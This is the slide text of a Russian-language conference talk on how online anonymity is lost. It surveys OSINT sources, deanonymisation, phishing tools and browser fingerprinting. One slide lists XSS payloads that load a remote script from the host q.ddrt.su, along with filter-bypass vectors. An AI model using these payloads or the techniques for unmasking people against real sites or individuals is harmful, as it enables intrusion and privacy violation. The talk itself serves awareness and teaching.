Анонимность
все дела, почему её нет
и почему вы сами виноваты
Roman “deadroot” Ananev
Дисклеймер
• Исключительно в познавательных и
образовательных целях
• Все, что будет сказано, это чисто мое мнение и
никому навязывать я его не собираюсь, так не
надо тут потом это того :)
TL;DR;
• OSINT
• XSS + phishing
• Вы сами виноваты
Open-Source INTelligence
OSINT
• Поиск в открытых источниках
• Социальные сети (fb, linkedin, twitter, instagram, vk,
google+, …)
• Мессенджеры (tg, messenger, viber, …)
• Форумы, сайты, блоги
• Поисковики (Google, yandex, …)
• Формы восстановления паролей
• …
info@nastachku.ru
vk
vk
fb
¯  _ (ツ) _ / ¯
но можно было и проще
На самом деле OSINT сложнее
facebook
и интереснее
google
yahoo bing
phone number
linkedin
@email
twitter
facebook
username
pastebin
На самом деле OSINT сложнее
facebook
и интереснее
google
yahoo
bing
phone number
linkedin
@email
photo/images
twitter
facebook
username
IP  DNS
pastebin
domain name
news
На самом деле OSINT сложнее
facebook
и интереснее
google
yahoo
bing
phone number
linkedin
@email
photo/images
twitter
facebook
username
IP  DNS
pastebin
domain name
news
satellite
video
documents
crime data
VIN
forums
games
archive
periscope
На самом деле OSINT сложнее
facebook
и интереснее
google
yahoo
bing
phone number
linkedin
@email
photo/images
twitter
facebook
username
IP  DNS
pastebin
domain name
news
satellite
video
documents
crime data
VIN
forums
games
archive
periscope
Вычислю по IP!!1одынодын
Censys
Whois
Shodan
Bing
https://inteltechniques.com/osint/
LinkedIn
https://inteltechniques.com/osint/
Имя и Фамилия
https://inteltechniques.com/osint/
Номер телефона?
https://inteltechniques.com/osint/
Email
https://inteltechniques.com/osint/
Username
https://inteltechniques.com/osint/
Documents
https://inteltechniques.com/osint/
Twitter
https://inteltechniques.com/osint/
На самом деле OSINT сложнее
и интереснее
если ты не ленив :)
https://github.com/jivoi/awesome-osint
https://github.com/sebdraven/OSINT
https://github.com/ilektrojohn/creepy
https://github.com/pirate/mesh-networking
https://github.com/automatingosint/osint_public
https://google.com
PPLSrch
Активная деанонимизация
не совсем OSINT
• Поиск в прочих местах, но тоже открытых
• Фишинг и активная деанонимизация
• Взломанные базы данных и утекшие данные
• Газеты, журналы
BlackMarket
Социальная инженерия
XSS
• ">')&#34&#62</stYle/</titLe/</teXtarEa/</scRipt/--!><img
src="0:0" onerror="(function(u){var
d=document,s=d.createElement('script');s.src=u;(d.head||
d.documentElement).appendChild(s);s.parentNode.remov
eChild(s);}('//q.ddrt.su'));">
• ">-->'></script><script/src=//q.ddrt.su></script>
• <!’/*!"/*!//'/*//"/*--!><Input/Autofocus/%0D*/
Onfocus=confirm`1`//><Svg>
• <iframe/src=javascript:
%2561%256c%2565%2572%2574``>
http://samy.pl/evercookie/
https://github.com/Valve/fingerprintjs2
De-anon? Easy!
SNdtctr
Phishing
https://github.com/gophish/gophish
https://github.com/wifiphisher/wifiphisher
usine$$
https://www.secureworks.com/resources/rp-2016-underground-hacker-marketplace-report
usine$$
https://www.secureworks.com/resources/rp-2016-underground-hacker-marketplace-report
Apple, Google
Analytics
А на самом деле вы
виноваты сами :)
http://imarker.ru
Что с нами стало :(
JS, Flash, TOR, VPN, …
Telegram: @deadroot
Остальное найдете сами, если надо ;)
Roman “deadroot” Ananev
Simtech Development

[STACHKA] Roman Ananev - Privacy is dead!